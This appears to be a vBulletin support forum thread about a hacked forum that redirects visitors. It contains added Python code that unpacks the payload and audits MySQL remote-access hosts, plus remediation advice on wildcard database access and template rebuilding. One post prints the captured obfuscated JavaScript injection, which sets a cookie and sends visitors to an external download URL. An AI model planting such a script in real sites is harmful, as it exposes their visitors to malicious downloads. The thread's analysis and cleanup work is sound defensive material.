vBulletin 3.x and 4.x Redirect Security Exploit
-
The release Mert mentioned is shown as vbseo_sitemap-3-0_PL1 on the zip file
Seems my own problem with the sitemap errors was down to not setting vbSEO to kill non-English characters in the URLs
Fat-fingered user error on that one
I know there has also been another pr update this week which can affect traffic for a few days.
-
I removed vbSEO and installed vBulletin CLEAN on June 29. I'm still getting this redirect issue. My traffic went from 800 visits/day last July, crushing my site's pagerank, traffic, etc., to 40-80, and it's remained that way ever since.
I don't know if this is it, but I used Charles to check the response when going to my site and it returned this:
Code:
<html><head></head><body><script type="text/javascript">var vbsp='A0620CB8';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('t a=["\\z\\b\\c\\n\\e\\j\\b","\\k\\b\\c\\n\\e\\j\\b","\\A\\x\\b\\L\\f\\e\\p\\b\\k\\i","\\c\\d\\K\\M\\n\\N\\c\\p\\e\\o\\z","\\q\\d\\d\\J\\e\\b","\\i","\\A\\x\\f\\s\\c\\l\\i\\g","\\D\\F\\k\\f","\\G","\\r\\d\\q\\s\\c\\e\\d\\o","\\l\\c\\c\\f\\H\\g\\g\\j\\P\\Q\\e\\r\\b\\k\\c\\d\\p\\b\\B\\q\\d\\j\\g\\m\\d\\R\\o\\r\\d\\s\\m\\B\\f\\l\\f\\S\\e\\m\\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a[U]+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'.split('|'),0,{}))</script></body></html>
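The script captured above is wrapped in the common eval(function(p,a,c,k,e,d){...}) packer. The Python below is an analysis aid added here; it is not part of the post, of vBulletin or of vbSEO. It expands the payload statically (nothing is eval'd) so the behaviour can be read: it rebuilds the packer's dictionary the same way the wrapper's e() function does, decodes the \xNN escapes in the string table, and inlines the array lookups. The four packer arguments are copied from the script above; the helper names (encode_key, unpack, deobfuscate, summarize) are mine, and summarize is tied to this sample (it looks for the ipbcc call the payload happens to use), not a general rule.

```python
import json
import re

# Added analysis helper, not part of the forum post. Static unpacker for the
# eval(function(p,a,c,k,e,d){...}) wrapper seen in the captured response.

# The four packer arguments, copied verbatim from the script in the post above.
PACKED_P = (
    't a=["\\z\\b\\c\\n\\e\\j\\b","\\k\\b\\c\\n\\e\\j\\b","\\A\\x\\b\\L\\f\\e\\p\\b\\k\\i",'
    '"\\c\\d\\K\\M\\n\\N\\c\\p\\e\\o\\z","\\q\\d\\d\\J\\e\\b","\\i","\\A\\x\\f\\s\\c\\l\\i\\g",'
    '"\\D\\F\\k\\f","\\G","\\r\\d\\q\\s\\c\\e\\d\\o",'
    '"\\l\\c\\c\\f\\H\\g\\g\\j\\P\\Q\\e\\r\\b\\k\\c\\d\\p\\b\\B\\q\\d\\j\\g\\m\\d\\R\\o\\r\\d\\s\\m\\B\\f\\l\\f\\S\\e\\m\\i"];'
    'E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};'
    'y(a[7],a[8]);v[a[9]]=a[U]+V;'
)
PACKED_A = 58
PACKED_C = 58
PACKED_K = (
    '||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|'
    'x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|'
    'function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'
).split('|')

_DIGITS36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_key(n, base):
    """Re-implementation of the packer's e(): dictionary index -> token.
    0-9 and a-z come from base 36; 36 and above become 'A', 'B', ... (chr(r+29))."""
    prefix = "" if n < base else encode_key(n // base, base)
    r = n % base
    return prefix + (chr(r + 29) if r > 35 else _DIGITS36[r])


def unpack(p, a, c, k):
    """Step 1: replace every token in p with its word from k (identity if k[i] is empty)."""
    table = {encode_key(i, a): (k[i] or encode_key(i, a)) for i in range(c)}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p)


def decode_hex_escapes(src):
    """Step 2: turn \\xNN escapes inside the string table into plain characters."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), src)


def inline_string_table(src):
    """Step 3: substitute NAME[n] lookups with the literal from 'var NAME=[...];'."""
    m = re.search(r"var (\w+)=(\[[^\]]*\]);", src)
    if not m:
        return src
    name, table = m.group(1), json.loads(m.group(2))
    return re.sub(re.escape(name) + r"\[(\d+)\]",
                  lambda mm: json.dumps(table[int(mm.group(1))]), src)


def deobfuscate(p, a, c, k):
    return inline_string_table(decode_hex_escapes(unpack(p, a, c, k)))


def summarize(clear_source):
    """Pull out the indicators an analyst wants; the ipbcc name is specific to this sample."""
    lifetime = re.search(r"\+(\d+)\)", clear_source)
    target = re.search(r'document\["location"\]="([^"]*)"', clear_source)
    cookie = re.search(r'ipbcc\("([^"]*)","([^"]*)"\)', clear_source)
    return {
        "cookie": cookie.group(1) if cookie else None,
        "cookie_lifetime_ms": int(lifetime.group(1)) if lifetime else None,
        "redirect_prefix": target.group(1) if target else None,
    }


if __name__ == "__main__":
    cleaned = deobfuscate(PACKED_P, PACKED_A, PACKED_C, PACKED_K)
    print(cleaned)
    print(summarize(cleaned))
```

The cleaned source defines one function that sets a cookie named after the page's vbsp variable with a 24-hour (86400000 ms) expiry, calls it, and then assigns document.location to an external download.php?id= URL with the vbsp value appended. The decoded URL is the indicator to search for in web-server logs and in the compiled templates and datastore that later posts in this thread say to rebuild.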
-
With the help of the security people at RealWebHost.net, we have now positively identified the method for injecting this exploit as well as specific vulnerabilities that permitted it on a 3.83, since updated to 3.87 PL2: As it turns out, it was a server configuration and security issue combined with some specific attributes of vBulletin installations which gave the intruder direct access to the MySQL database.
The key is first to check your settings in cPanel for Remote MySQL: Unless you are using a database on a remote server, i.e., NOT on localhost, this setting should say "There are no additional MySQL access hosts configured". If you have a specific database intentionally enabled, that too is okay. What should NEVER be there is the character % - this is a wildcard which allows ALL other servers to connect to the database. If you see the wildcard enabled, DELETE IT.
Then, make sure you change your passwords to strong passwords for both cPanel and MySQL to ensure that no one can change this setting back without your knowledge.
Then, pick any add-on, disable it, then re-enable it to clear the datastore.
Finally, download the file tool_reparse.php from http://www.vbulletin.org/forum/showthread.php?t=220967 and let it find discrepancies in your compiled templates and rebuild them.
Last edited by djbaxter; Sun 17 Jul '11, 2:19pm.
-
Cheers for that.
1am in the morning here and I have just seen this. I'm now in the process of having kittens
Did the database check and found two entries
192.168.1.%
88.148.9.210
Can I just kill those two entries or is the localhost one with the wild card % something to worry about deleting
Thanks for all the hard work and persistence in finding the solution to this
-
Cheers for that.
I took the brave approach. Checked another cpanel and database I have set up on my server.
And it showed exactly as you said.
Killed both the above without any adverse effect apart from the forums seeming to speed up on page loads
Top man.
-
I was having my second litter of kittens when I checked my cpanel today and found 192.168.1.% had returned
I have been in touch with my server techs and this is the reply they gave, which also clarifies the % wild card hacking
That is part of the MySQL server by default.
Because you can use IP wildcard values in host values (for example, '192.168.1.%' to match every host on a subnet), someone could try to exploit this capability by naming a host 192.168.1.somewhere.com. To foil such attempts, MySQL disallows matching on host names that start with digits and a dot. Thus, if you have a host named something like 1.2.example.com, its name never matches the host part of account names. An IP wildcard value can match only IP numbers, not host names.
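Two checks from this thread in one added Python example (not the thread's, cPanel's or MySQL's own code): djbaxter's review of Remote MySQL access hosts for the % wildcard, and the host-matching rule the server techs quoted above. audit_hosts reviews (User, Host) rows as returned by SELECT User, Host FROM mysql.user, skips local hosts and an explicit allow-list, and proposes a DROP USER statement for everything else; host_matches is a simplified model of the documented matching rule (an assumption, not MySQL's full algorithm). The sample rows, the user name forumdb and the allow-list are constructed; 192.168.1.% and 88.148.9.210 are the two entries reported earlier in the thread.

```python
import ipaddress
import re

# Added example, not cPanel's or vBulletin's code. Reviews MySQL account hosts
# the way the thread recommends and models the host-matching rule quoted above.

# Hosts a cPanel-hosted forum normally needs; anything else gets a finding.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

# Constructed sample of `SELECT User, Host FROM mysql.user`. The user name
# 'forumdb' is made up; the two remote entries are the ones reported in the thread.
SAMPLE_ROWS = [
    ("forumdb", "localhost"),
    ("forumdb", "%"),
    ("forumdb", "192.168.1.%"),
    ("forumdb", "88.148.9.210"),
    ("root", "localhost"),
]


def _is_ipv4(value):
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def host_matches(account_host, client):
    """Simplified model (an assumption, not MySQL's full algorithm) of how a
    connecting client is matched against the Host column of an account.

    '%' and '_' are LIKE-style wildcards. A client host *name* that starts with
    digits and a dot (1.2.example.com, 192.168.1.somewhere.com) never matches,
    so an IP wildcard such as 192.168.1.% can match only IP numbers.
    Netmask syntax and IPv6 are not modelled.
    """
    if not _is_ipv4(client) and re.match(r"\d+\.", client):
        return False
    regex = "".join(".*" if ch == "%" else "." if ch == "_" else re.escape(ch)
                    for ch in account_host)
    return re.fullmatch(regex, client, re.IGNORECASE) is not None


def audit_hosts(rows, allowed_remote=()):
    """Return a finding for every (user, host) pair that is neither local nor
    explicitly allowed, with the SQL that would remove that account.

    cPanel's Remote MySQL screen edits the same grants through the UI; the
    DROP USER statement is taken here to be the direct MySQL equivalent.
    """
    findings = []
    for user, host in rows:
        if host in LOCAL_HOSTS or host in allowed_remote:
            continue
        if host == "%":
            severity, note = "critical", "any host anywhere may connect"
        elif "%" in host or "_" in host:
            severity, note = ("warning",
                              "wildcard: every IP number matching the pattern may connect")
        else:
            severity, note = "review", "specific remote host; confirm it is yours"
        findings.append({
            "user": user, "host": host, "severity": severity, "note": note,
            "fix": f"DROP USER '{user}'@'{host}';",
        })
    return findings


if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_ROWS):
        print(f"{f['severity']:<9}{f['user']:<10}{f['host']:<15}{f['fix']}")
    print(host_matches("192.168.1.%", "192.168.1.55"))             # True
    print(host_matches("192.168.1.%", "192.168.1.somewhere.com"))  # False
```

The severities keep the two cases in this thread apart: a bare % is the entry djbaxter says must never be present, while 192.168.1.% (which the thread reports coming back after deletion) only admits IP numbers on that subnet, so it is flagged for review rather than treated as the intruder's door. Any specific remote address you did not add yourself belongs in the "review" bucket until you know whose it is.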
-
The cPanel glitch I have is mentioned on the cPanel support forum
Seems like others have experienced the return of 192.168.1.% after they have deleted it
It doesn't make what's happening right.
-
To reiterate, you can erase it temporarily by disabling and then re-enabling any product but the key is to figure out how the bastard is getting in.
Have you changed your passwords, especially for cPanel and phpMyAdmin? Is your AdminCP folder password protected? Do you have
Code:
Options All -Indexes
What version of vBulletin are you running again?
-
Looks like it might have been a false positive this time
As soon as I added evolve chat bar the errors came in
Uninstalled the bar, run the test and the warnings went
I'm not taking any chances on this one
Touch wood, my remote access on the database has not come back.